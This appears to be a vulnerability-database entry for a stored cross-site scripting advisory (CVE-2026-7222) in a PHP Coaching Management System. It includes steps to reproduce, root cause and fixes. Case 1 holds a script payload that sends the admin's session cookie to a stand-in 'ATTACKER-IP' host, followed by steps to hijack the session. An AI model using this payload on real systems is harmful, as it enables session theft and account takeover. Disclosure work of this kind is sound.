📄 Coaching Management System 1.0 Cross Site Scripting_PACKETSTORM:220047

5.1 / 10

MEDIUM

CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/SC:N/VI:L/SI:N/VA:N/SA:N/E:P

Description

Coaching Management System version 1.0 suffers from a persistent cross site scripting vulnerability...

Visit Original Source

Basic Information

ID PACKETSTORM:220047

Published Apr 29, 2026 at 00:00

Affected Product

Affected Versions ### Stored Cross-Site Scripting (XSS) in Coaching Management System Leads to Account Takeover

---

## Product

Coaching Management System in PHP (Code-Projects.org)
https://code-projects.org/coaching-management-system-in-php-with-source-code/

---

## Affected Components

* /modules/student/complaint.php (Complaint Submission)
* /modules/admin/incomingcomplaint.php (Complaint Viewing)
* Complaint Reply Functionality (Admin/Teacher → Student)

---

## Version

Unknown (No version information provided by the vendor; tested on the latest available version from Code-Projects.org as of April 2026)

---

## Vulnerability Type

CWE-79: Improper Neutralization of Input During Web Page Generation (Stored Cross-Site Scripting)

---

## Description

The application fails to properly sanitize user-supplied input in the complaint and reply functionality. Malicious JavaScript injected by a low-privileged user is stored and executed when viewed by higher-privileged users such as administrators or teachers.

Additionally, the reply functionality is also vulnerable, allowing administrators or teachers to inject JavaScript that executes in student sessions.

This results in stored XSS vulnerability affecting multiple user roles.

---

## Steps to Reproduce

### Case 1: Student → Admin (Privilege Escalation)

1. Login as Student
2. Navigate to:
/modules/student/complaint.php
<img width="1920" height="1080" alt="Screenshot 2026-04-10 212940" src="https://github.com/user-attachments/assets/2e6e72ed-bd2f-4e77-850a-a0b0f28a6aba" />

4. Submit a complaint with the following payload:

```html
<script>
new Image().src="http://ATTACKER-IP:PORT/?c="+document.cookie;
</script>
```
<img width="1920" height="1080" alt="Screenshot 2026-04-10 213341" src="https://github.com/user-attachments/assets/dbddb6ef-6380-403e-91da-fc8012d0d08b" />

4. Login as Admin
5. Navigate to:
/modules/admin/incomingcomplaint.php
<img width="1920" height="1080" alt="Screenshot 2026-04-10 212951" src="https://github.com/user-attachments/assets/c4e07392-a5ff-4885-8f5f-ac5e1da4ac25" />

7. When the admin views the complaint, the payload executes automatically
8. The admin session cookie is sent to the attacker-controlled server
9. Use the stolen session cookie to hijack the admin session
<img width="1920" height="1080" alt="Screenshot 2026-04-10 213350" src="https://github.com/user-attachments/assets/432fa992-6147-4abb-b37d-11e8f84c7fb4" />
<img width="1920" height="1080" alt="Screenshot 2026-04-10 213406" src="https://github.com/user-attachments/assets/935f3cda-c802-401b-bd6d-8a6783078586" />

---

### Case 2: Admin → Student (Reverse XSS)

1. Login as Admin
2. Reply to a complaint using payload:

```html
<img src=x onerror=alert(window.location)>
```

3. Login as Student
4. View the complaint reply

---

## Proof of Concept Evidence

* JavaScript execution confirmed in admin panel upon viewing malicious complaint
* Session cookie (PHPSESSID) successfully exfiltrated via attacker-controlled server
* Admin session hijacked using stolen cookie
* JavaScript execution confirmed in student panel via reply functionality

---

## Impact

* Low-privileged users (students) can execute arbitrary JavaScript in admin context
* Leads to session hijacking due to absence of HttpOnly flag
* Full administrative account takeover
* Bidirectional XSS allows compromise of multiple roles (Admin, Teacher, Student)
* Complete compromise of application integrity, confidentiality, and availability

Severity: CRITICAL

---

## Root Cause

* Lack of input sanitization
* Absence of output encoding
* Missing security controls on session cookies (HttpOnly flag not set)

---

## Recommendation

* Sanitize and validate all user inputs.
* Encode output using functions like htmlspecialchars() in PHP
* Set HttpOnly and Secure flags on session cookies
* Implement Content Security Policy (CSP)

---

{
    "lastseen": "2026-04-29T17:06:35",
    "description": "Coaching Management System version 1.0 suffers from a persistent cross site scripting vulnerability...",
    "published": "2026-04-29T00:00:00",
    "modified": "2026-04-29T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 Coaching Management System 1.0 Cross Site Scripting",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:220047",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2026-7222"
    ],
    "sourceData": "### Stored Cross-Site Scripting (XSS) in Coaching Management System Leads to Account Takeover\n    \n    ---\n    \n    ## Product\n    \n    Coaching Management System in PHP (Code-Projects.org)\n    https://code-projects.org/coaching-management-system-in-php-with-source-code/\n    \n    ---\n    \n    ## Affected Components\n    \n    * /modules/student/complaint.php (Complaint Submission)\n    * /modules/admin/incomingcomplaint.php (Complaint Viewing)\n    * Complaint Reply Functionality (Admin/Teacher \u2192 Student)\n    \n    ---\n    \n    ## Version\n    \n    Unknown (No version information provided by the vendor; tested on the latest available version from Code-Projects.org as of April 2026)\n    \n    ---\n    \n    ## Vulnerability Type\n    \n    CWE-79: Improper Neutralization of Input During Web Page Generation (Stored Cross-Site Scripting)\n    \n    ---\n    \n    ## Description\n    \n    The application fails to properly sanitize user-supplied input in the complaint and reply functionality. Malicious JavaScript injected by a low-privileged user is stored and executed when viewed by higher-privileged users such as administrators or teachers.\n    \n    Additionally, the reply functionality is also vulnerable, allowing administrators or teachers to inject JavaScript that executes in student sessions.\n    \n    This results in stored XSS vulnerability affecting multiple user roles.\n    \n    ---\n    \n    ## Steps to Reproduce\n    \n    ### Case 1: Student \u2192 Admin (Privilege Escalation)\n    \n    1. Login as Student\n    2. Navigate to:\n       /modules/student/complaint.php\n       <img width=\"1920\" height=\"1080\" alt=\"Screenshot 2026-04-10 212940\" src=\"https://github.com/user-attachments/assets/2e6e72ed-bd2f-4e77-850a-a0b0f28a6aba\" />\n    \n    4. Submit a complaint with the following payload:\n    \n    ```html\n    <script>\n    new Image().src=\"http://ATTACKER-IP:PORT/?c=\"+document.cookie;\n    </script>\n    ```\n    <img width=\"1920\" height=\"1080\" alt=\"Screenshot 2026-04-10 213341\" src=\"https://github.com/user-attachments/assets/dbddb6ef-6380-403e-91da-fc8012d0d08b\" />\n    \n    \n    4. Login as Admin\n    5. Navigate to:\n       /modules/admin/incomingcomplaint.php\n       <img width=\"1920\" height=\"1080\" alt=\"Screenshot 2026-04-10 212951\" src=\"https://github.com/user-attachments/assets/c4e07392-a5ff-4885-8f5f-ac5e1da4ac25\" />\n    \n    7. When the admin views the complaint, the payload executes automatically\n    8. The admin session cookie is sent to the attacker-controlled server\n    9. Use the stolen session cookie to hijack the admin session\n       <img width=\"1920\" height=\"1080\" alt=\"Screenshot 2026-04-10 213350\" src=\"https://github.com/user-attachments/assets/432fa992-6147-4abb-b37d-11e8f84c7fb4\" />\n    <img width=\"1920\" height=\"1080\" alt=\"Screenshot 2026-04-10 213406\" src=\"https://github.com/user-attachments/assets/935f3cda-c802-401b-bd6d-8a6783078586\" />\n    \n    \n    ---\n    \n    ### Case 2: Admin \u2192 Student (Reverse XSS)\n    \n    1. Login as Admin\n    2. Reply to a complaint using payload:\n    \n    ```html\n    <img src=x onerror=alert(window.location)>\n    ```\n    \n    3. Login as Student\n    4. View the complaint reply\n    \n    ---\n    \n    ## Proof of Concept Evidence\n    \n    * JavaScript execution confirmed in admin panel upon viewing malicious complaint\n    * Session cookie (PHPSESSID) successfully exfiltrated via attacker-controlled server\n    * Admin session hijacked using stolen cookie\n    * JavaScript execution confirmed in student panel via reply functionality\n    \n    ---\n    \n    ## Impact\n    \n    * Low-privileged users (students) can execute arbitrary JavaScript in admin context\n    * Leads to session hijacking due to absence of HttpOnly flag\n    * Full administrative account takeover\n    * Bidirectional XSS allows compromise of multiple roles (Admin, Teacher, Student)\n    * Complete compromise of application integrity, confidentiality, and availability\n    \n    Severity: CRITICAL\n    \n    ---\n    \n    ## Root Cause\n    \n    * Lack of input sanitization\n    * Absence of output encoding\n    * Missing security controls on session cookies (HttpOnly flag not set)\n    \n    ---\n    \n    ## Recommendation\n    \n    * Sanitize and validate all user inputs.\n    * Encode output using functions like htmlspecialchars() in PHP\n    * Set HttpOnly and Secure flags on session cookies\n    * Implement Content Security Policy (CSP)\n    \n    ---",
    "sourceHref": "https://packetstorm.news/download/220047",
    "cvss": {
        "score": 5.1,
        "severity": "MEDIUM",
        "vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/SC:N/VI:L/SI:N/VA:N/SA:N/E:P",
        "version": "4.0"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "3.0",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N/E:P/RC:R",
            "baseScore": 3.5,
            "baseSeverity": "LOW",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "REQUIRED",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
        }
    },
    "href": "https://packetstorm.news/files/id/220047/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply